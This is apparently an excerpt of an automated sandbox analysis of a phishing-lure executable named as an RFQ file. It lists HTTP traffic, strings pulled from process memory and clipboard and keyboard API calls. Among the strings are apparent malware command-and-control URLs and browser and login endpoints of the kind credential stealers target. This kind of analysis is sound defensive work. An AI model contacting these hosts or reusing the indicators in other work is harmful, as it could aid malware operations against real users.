              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 04 Jul 2024 01:13:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 04 Jul 2024 01:13:26 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 04 Jul 2024 01:13:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 04 Jul 2024 01:13:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 04 Jul 2024 01:13:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: runonce.exe, 0000000F.00000002.4105089427.0000000004FE4000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000010.00000002.4104953785.0000000003934000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.3934094880.00000000031D4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://ndhockeyprospects.com/nce6/?5DGDh=Hn3dOR&b4=Ed8kY/rwObA0p5m5nhu
              Source: xl9lsbb.exe, 0000000B.00000002.3205108793.0000000002C39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4105348256.0000000004AC5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hsck520.com
              Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4105348256.0000000004AC5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hsck520.com/2e2r/
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000010.00000002.4103523467.000000000159E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qmancha.com
              Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000010.00000002.4103523467.000000000159E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qmancha.com/3in6/
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: firefox.exe, 00000008.00000002.2030768757.000000003DCC4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.livechatinc.com/tracking.js
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
              Source: RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
              Source: RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
              Source: RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
              Source: RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
              Source: RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
              Source: runonce.exe, 0000000F.00000002.4101900693.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: RMActivate_ssp.exe, 00000003.00000002.4101608329.000000000339E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4101900693.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: runonce.exe, 0000000F.00000002.4101900693.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: RMActivate_ssp.exe, 00000003.00000002.4101608329.000000000339E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4101900693.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: runonce.exe, 0000000F.00000002.4101900693.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: RMActivate_ssp.exe, 00000003.00000002.4101608329.0000000003380000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4101900693.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: RMActivate_ssp.exe, 00000003.00000003.1923274383.0000000008116000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3826100724.000000000760F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
              Source: RMActivate_ssp.exe, 00000003.00000002.4106518555.00000000043E4000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000029E4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003DCC4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://v-cn.vaptcha.com/v3.js
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: RMActivate_ssp.exe, 00000003.00000002.4106518555.00000000043E4000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000029E4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003DCC4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.livechat.com/?welcome
              Source: RMActivate_ssp.exe, 00000003.00000002.4106518555.00000000043E4000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000029E4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003DCC4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.livechat.com/chat-with/14282961/
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EE425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EE425A
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EE4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00EE4458
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EE425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EE425A
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00ED0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00ED0219
